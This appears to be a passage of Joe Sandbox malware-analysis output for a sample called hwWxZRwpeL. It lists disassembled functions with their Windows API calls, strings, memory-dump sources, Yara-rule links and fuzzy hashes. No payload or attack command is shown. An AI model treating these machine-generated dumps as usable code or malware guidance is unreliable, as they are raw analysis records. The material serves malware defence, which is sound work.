                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5F5FB2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 05925a0a2b44a7a72c5324338e5ef8f315da4f39ba0b73a377da281413da36ce
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 737218160b7d423da58f8143ff0f9a2f3b30ef60a11bf7ece1a09c163b6a3710
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05925a0a2b44a7a72c5324338e5ef8f315da4f39ba0b73a377da281413da36ce
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA219F742046019FDB14DF29C888A6AB7B5EF8830DF25482DE55B83B51DB31F948CB59
                                                                                                                                                                                                                                                                                                                                  Function 6C5E1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C5E1699
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E16CB
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E16D7
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E16DE
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E16E5
                                                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C5E16EC
                                                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5E16F9
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 375572348-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e6587165c126d1282ba19e7f97d374db92699eb14890d3bdd02e861d4d3bac1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: af939b88a34692d58bd748ea896bf9a25665b00e23c2f9321e85b4e0a27894f7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e6587165c126d1282ba19e7f97d374db92699eb14890d3bdd02e861d4d3bac1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E2102B07402086FEB10AB658C85FBBB3BCEFCA704F508528F6059B680C6799D548AA5
                                                                                                                                                                                                                                                                                                                                  Function 6C61F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: GetCurrentProcess.KERNEL32(?,6C5D31A7), ref: 6C60CBF1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5D31A7), ref: 6C60CBFA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5E4A68), ref: 6C61945E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C619470
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C619482
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: __Init_thread_footer.LIBCMT ref: 6C61949F
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61F619
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C61F598), ref: 6C61F621
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6194EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C619508
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61F637
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8,?,?,00000000,?,6C61F598), ref: 6C61F645
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8,?,?,00000000,?,6C61F598), ref: 6C61F663
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C61F62A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 81668e69fff896bd8ec90d8e1c8c532579bd5ea0b36b72eec591fab869533bcd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 48961d4249ed467fab7fec41923b139f2d1d617ddb26f1ed40591ff4f534c0f9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81668e69fff896bd8ec90d8e1c8c532579bd5ea0b36b72eec591fab869533bcd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09119475305205ABCB04EF5AD5849A57779FF8636DFA40015EA0583F42CB71A821CBAE
                                                                                                                                                                                                                                                                                                                                  Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
                                                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 004194B7
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                                                                  • String ID: >=A$>=A
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1378416451-3536956848
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85
                                                                                                                                                                                                                                                                                                                                  Function 6C61F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5E4A68), ref: 6C61945E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C619470
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C619482
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: __Init_thread_footer.LIBCMT ref: 6C61949F
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61F559
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C61F561
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6194EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C619508
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61F577
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61F585
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61F5A3
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C61F56A
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_pause_sampling, xrefs: 6C61F3A8
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_resume_sampling, xrefs: 6C61F499
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_resume, xrefs: 6C61F239
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3555eddccfdba5cba58036ba0662295be5a3bf124db81d656da9429086dc86c2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 97905f64da325c01969e40aaf5b70669f32092f2360457fcf2c8cf8979fe635b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3555eddccfdba5cba58036ba0662295be5a3bf124db81d656da9429086dc86c2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDF0B4753002009BDB00EF6AD88896A77BDEFC629EFA40411EA05C3B02CB314801876E
                                                                                                                                                                                                                                                                                                                                  Function 6C5E0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,6C5E0DF8), ref: 6C5E0E82
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C5E0EA1
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E0EB5
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C5E0EC5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                                                                                                                                  • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 391052410-1680159014
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b6c64fc54756127426cf8d7d13c3dbdb27662ff7d37c8bcbacad52a0e46468a8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 28d535ed19dedb1e3d77c7a8723af34c3718bd1020ebb6a41d4ff3200f381c5f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6c64fc54756127426cf8d7d13c3dbdb27662ff7d37c8bcbacad52a0e46468a8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6012470B00281CFDF10DFEAE994A6237B6E78A358FB00526A90192B40DB74A4199E1E
                                                                                                                                                                                                                                                                                                                                  Function 6C61F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5E4A68), ref: 6C61945E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C619470
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C619482
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: __Init_thread_footer.LIBCMT ref: 6C61949F
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61F619
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C61F598), ref: 6C61F621
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6194EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C619508
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61F637
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8,?,?,00000000,?,6C61F598), ref: 6C61F645
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8,?,?,00000000,?,6C61F598), ref: 6C61F663
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C61F62A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2848912005-753366533
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 96b2eb0e6944472878cc3ccb8998f5b71c573a6a4ddaf61b3cb037ee33f35c1c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e9c3139e3397db96b04a70193834cb6f71ab6b7f953169b8750f6e3d7e7367e7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96b2eb0e6944472878cc3ccb8998f5b71c573a6a4ddaf61b3cb037ee33f35c1c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9F05B75304204ABDB009F6AD88896A777DEFC629DFA40415EA4593742CB754805876E
                                                                                                                                                                                                                                                                                                                                  Function 6C6105F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C60CFAE,?,?,?,6C5D31A7), ref: 6C6105FB
                                                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C60CFAE,?,?,?,6C5D31A7), ref: 6C610616
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C5D31A7), ref: 6C61061C
                                                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C5D31A7), ref: 6C610627
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _writestrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 88fa90612e95f2b579c9fe2d2192ac2b9b44ad7233cde9d5503e6c94fd25d721
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d66d522407a2ebb6d6c80db0d5612696a493e0f9069b8c498a99fab5cd0415b8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88fa90612e95f2b579c9fe2d2192ac2b9b44ad7233cde9d5503e6c94fd25d721
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E08CE2A0101037F6146256AC86DBB761DDBC6138F084039FE0E83701E94AAD1E51FA
                                                                                                                                                                                                                                                                                                                                  Function 6C5E05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0ed82d46266d3903c96cad65653aaa697a1e5760911ee9a286e522616d94fd37
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ed9e6a698bd1da4e4f3a66b31c1c6b30059c5f57f66f84441de033bf4d90d32c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ed82d46266d3903c96cad65653aaa697a1e5760911ee9a286e522616d94fd37
